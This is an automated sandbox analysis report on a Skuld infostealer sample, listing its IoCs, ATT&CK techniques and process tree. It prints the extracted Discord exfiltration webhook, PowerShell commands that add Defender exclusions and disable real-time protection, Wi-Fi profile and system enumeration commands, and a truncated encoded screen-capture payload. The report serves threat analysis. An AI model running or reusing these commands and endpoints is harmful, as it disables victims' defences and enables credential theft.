skuld | b3be9f3bfcfa597bd30f7f9e52ef5b901491e84ae8bb2739006ef658be617891

Analysis

max time kernel
93s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 23:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
Size

10.3MB
MD5

3e58b3488744628bca8063ec01a6b361
SHA1

b9cdef6699826f272bc104f0b8d4acb782f7a71d
SHA256

b3be9f3bfcfa597bd30f7f9e52ef5b901491e84ae8bb2739006ef658be617891
SHA512

a12130cde4a4e6515981c1d5cb59e5f5be71c0023d2b8cf739d8ce170bf2b3fe2f3c945d7d22970ff9b7939ef67855f36c28bb00ca7080afce7a1ee808283992
SSDEEP

98304:i1lqRd4iyit8Rz+qTrHrYW9iEVrR1akuAx3hzEqP:iGRdQitkTrHrYW9jeqP

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1355177321123807363/7A57OHY5T3CCMXUv3pJRb3j0EYbnJUEHEbtc5HMHQiLivb6JWAx4aZorjkNYhmOakHAS

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1164	powershell.exe
3736	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
8	discord.com
9	api.gofile.io
5	discord.com
6	api.gofile.io

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1568	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1328	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	13	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
3736	powershell.exe
3736	powershell.exe
1164	powershell.exe
1164	powershell.exe
4180	powershell.exe
4180	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeIncreaseQuotaPrivilege	4192	wmic.exe
Token: SeSecurityPrivilege	4192	wmic.exe
Token: SeTakeOwnershipPrivilege	4192	wmic.exe
Token: SeLoadDriverPrivilege	4192	wmic.exe
Token: SeSystemProfilePrivilege	4192	wmic.exe
Token: SeSystemtimePrivilege	4192	wmic.exe
Token: SeProfSingleProcessPrivilege	4192	wmic.exe
Token: SeIncBasePriorityPrivilege	4192	wmic.exe
Token: SeCreatePagefilePrivilege	4192	wmic.exe
Token: SeBackupPrivilege	4192	wmic.exe
Token: SeRestorePrivilege	4192	wmic.exe
Token: SeShutdownPrivilege	4192	wmic.exe
Token: SeDebugPrivilege	4192	wmic.exe
Token: SeSystemEnvironmentPrivilege	4192	wmic.exe
Token: SeRemoteShutdownPrivilege	4192	wmic.exe
Token: SeUndockPrivilege	4192	wmic.exe
Token: SeManageVolumePrivilege	4192	wmic.exe
Token: 33	4192	wmic.exe
Token: 34	4192	wmic.exe
Token: 35	4192	wmic.exe
Token: 36	4192	wmic.exe
Token: SeIncreaseQuotaPrivilege	4192	wmic.exe
Token: SeSecurityPrivilege	4192	wmic.exe
Token: SeTakeOwnershipPrivilege	4192	wmic.exe
Token: SeLoadDriverPrivilege	4192	wmic.exe
Token: SeSystemProfilePrivilege	4192	wmic.exe
Token: SeSystemtimePrivilege	4192	wmic.exe
Token: SeProfSingleProcessPrivilege	4192	wmic.exe
Token: SeIncBasePriorityPrivilege	4192	wmic.exe
Token: SeCreatePagefilePrivilege	4192	wmic.exe
Token: SeBackupPrivilege	4192	wmic.exe
Token: SeRestorePrivilege	4192	wmic.exe
Token: SeShutdownPrivilege	4192	wmic.exe
Token: SeDebugPrivilege	4192	wmic.exe
Token: SeSystemEnvironmentPrivilege	4192	wmic.exe
Token: SeRemoteShutdownPrivilege	4192	wmic.exe
Token: SeUndockPrivilege	4192	wmic.exe
Token: SeManageVolumePrivilege	4192	wmic.exe
Token: 33	4192	wmic.exe
Token: 34	4192	wmic.exe
Token: 35	4192	wmic.exe
Token: 36	4192	wmic.exe
Token: SeIncreaseQuotaPrivilege	1560	wmic.exe
Token: SeSecurityPrivilege	1560	wmic.exe
Token: SeTakeOwnershipPrivilege	1560	wmic.exe
Token: SeLoadDriverPrivilege	1560	wmic.exe
Token: SeSystemProfilePrivilege	1560	wmic.exe
Token: SeSystemtimePrivilege	1560	wmic.exe
Token: SeProfSingleProcessPrivilege	1560	wmic.exe
Token: SeIncBasePriorityPrivilege	1560	wmic.exe
Token: SeCreatePagefilePrivilege	1560	wmic.exe
Token: SeBackupPrivilege	1560	wmic.exe
Token: SeRestorePrivilege	1560	wmic.exe
Token: SeShutdownPrivilege	1560	wmic.exe
Token: SeDebugPrivilege	1560	wmic.exe
Token: SeSystemEnvironmentPrivilege	1560	wmic.exe
Token: SeRemoteShutdownPrivilege	1560	wmic.exe
Token: SeUndockPrivilege	1560	wmic.exe
Token: SeManageVolumePrivilege	1560	wmic.exe
Token: 33	1560	wmic.exe
Token: 34	1560	wmic.exe
Token: 35	1560	wmic.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 2240	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	89
PID 2724 wrote to memory of 2240	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	89
PID 2724 wrote to memory of 3736	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	93
PID 2724 wrote to memory of 3736	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	93
PID 2724 wrote to memory of 4192	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	95
PID 2724 wrote to memory of 4192	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	95
PID 2724 wrote to memory of 1092	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	97
PID 2724 wrote to memory of 1092	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	97
PID 2724 wrote to memory of 1164	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	100
PID 2724 wrote to memory of 1164	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	100
PID 2724 wrote to memory of 1560	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	102
PID 2724 wrote to memory of 1560	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	102
PID 2724 wrote to memory of 1328	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	104
PID 2724 wrote to memory of 1328	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	104
PID 2724 wrote to memory of 1932	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	106
PID 2724 wrote to memory of 1932	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	106
PID 2724 wrote to memory of 4848	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	108
PID 2724 wrote to memory of 4848	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	108
PID 2724 wrote to memory of 5108	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	110
PID 2724 wrote to memory of 5108	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	110
PID 2724 wrote to memory of 1568	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	112
PID 2724 wrote to memory of 1568	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	112
PID 2724 wrote to memory of 4180	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	116
PID 2724 wrote to memory of 4180	2724	2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe	116
PID 4180 wrote to memory of 1316	4180	powershell.exe	119
PID 4180 wrote to memory of 1316	4180	powershell.exe	119
PID 1316 wrote to memory of 4912	1316	csc.exe	120
PID 1316 wrote to memory of 4912	1316	csc.exe	120

Views/modifies file attributes 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2240	attrib.exe
1092	attrib.exe
1932	attrib.exe
4848	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
  2⤵
  - Views/modifies file attributes
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2025-03-28_3e58b3488744628bca8063ec01a6b361_frostygoop_knight_luca-stealer_ngrbot_poet-rat_sliver_snatch.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3736
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4192
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1164
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1328
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1932
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4848
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:5108
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlA